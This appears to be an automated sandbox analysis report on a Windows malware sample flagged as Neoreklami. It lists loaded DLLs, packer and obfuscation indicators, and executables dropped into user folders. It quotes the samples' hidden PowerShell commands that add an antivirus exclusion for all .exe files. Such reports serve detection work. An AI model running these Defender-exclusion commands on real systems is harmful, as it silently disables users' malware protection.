Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: w32time.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\forfiles.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32

Jump to behavior

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe

File written: C:\Users\user\AppData\Local\Temp\!@tA09A.tmp.dir\setup.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lgX7lgUL1w.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: lgX7lgUL1w.exe

Static file information: File size 1843424 > 1048576

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lgX7lgUL1w.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: lgX7lgUL1w.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: lgX7lgUL1w.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH\| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp

Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lgX7lgUL1w.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Unpacked PE file: 8.2.PZ3hKWPffUrXuh6Gjn77Ivv1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Unpacked PE file: 38.2.E6ijlcXzCqRG7r61JO0b9evs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_00418320

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .themida

PE file contains sections with non-standard names

Source: lgX7lgUL1w.exe	Static PE information: section name: .managed
Source: lgX7lgUL1w.exe	Static PE information: section name: hydrated
Source: lgX7lgUL1w.exe	Static PE information: section name: _RDATA
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: .managed
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: hydrated
Source: lgX7lgUL1w.exe.0.dr	Static PE information: section name: _RDATA
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name: .themida
Source: EXHYoUWbk2EtGfzPiFxOh4fX.exe.5.dr	Static PE information: section name: .sxdata
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name: .themida
Source: o3bvuCFHWJf8oEmP3T0jhkMM.exe.5.dr	Static PE information: section name: .sxdata
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name: .themida
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe.5.dr	Static PE information: section name: .sxdata
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name: .themida
Source: gsV4lhPLd9AgpTxUWWWokC1J.exe.5.dr	Static PE information: section name: .sxdata
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name: .themida
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name: .themida
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name: .themida
Source: rCs1RclDFMYQLymrwE3zboPd.exe.5.dr	Static PE information: section name: .sxdata
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name: .themida
Source: PkqGBlFfXQGSePxTvCIfv7cw.exe.5.dr	Static PE information: section name: .sxdata
Source: gX97xQ1DxOEiWzmKIb4DOJWg.exe.5.dr	Static PE information: section name: .sxdata
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name: .themida
Source: KFwijURKZUrjToqwGsuVqcsD.exe.5.dr	Static PE information: section name: .sxdata
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name: .themida
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name: .themida
Source: JRzNWYaVkGhoqBVKINyNWHZb.exe.5.dr	Static PE information: section name: .sxdata
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name: .themida
Source: zl9WjeKTxMy8k8EbTBZdpElC.exe.5.dr	Static PE information: section name: .sxdata
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name: .themida

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: 7_3_04D8E613 push ecx; retf	7_3_04D8E61B
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00402CD7 push cs; retf	8_2_00402CD8
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401EA7 push 0000000Eh; retf 0038h	8_2_00401EB6
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033B6 push eax; ret	8_2_00403419
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E12D3E push cs; retf	8_2_02E12D3F
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E11F0E push 0000000Eh; retf 0038h	8_2_02E11F1D
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0302391F push ss; iretw	8_2_03023931
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03024934 push cs; retf	8_2_03024935
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03023D52 push cs; retf 0038h	8_2_03023DD1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03024FA8 push eax; ret	8_2_03024FA9
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03023DC2 push 0000000Eh; retf 0038h	8_2_03023DD1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03029DFE push 0000002Ah; iretd	8_2_03029E48
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00411360 push ecx; mov dword ptr [esp], ecx	18_2_00411361
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00413954 push eax; ret	18_2_00413972
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00413CC0 push eax; ret	18_2_00413CEE
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044174C2 push 0040E81Ch; ret	19_3_04417654
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044174E0 push 0040E81Ch; ret	19_3_04417654
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_04421498 push ecx; mov dword ptr [esp], ecx	19_3_0442149B
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_044214B8 push ecx; mov dword ptr [esp], ecx	19_3_044214BB
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_0441064C push ecx; mov dword ptr [esp], eax	19_3_0441064D
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_0441765E push 0040E88Fh; ret	19_3_044176C7
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Code function: 19_3_04417660 push 0040E88Fh; ret	19_3_044176C7

Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name: entropy: 7.284719044401107

Persistence and Installation Behavior

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Drops PE files to the document folder of the user

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
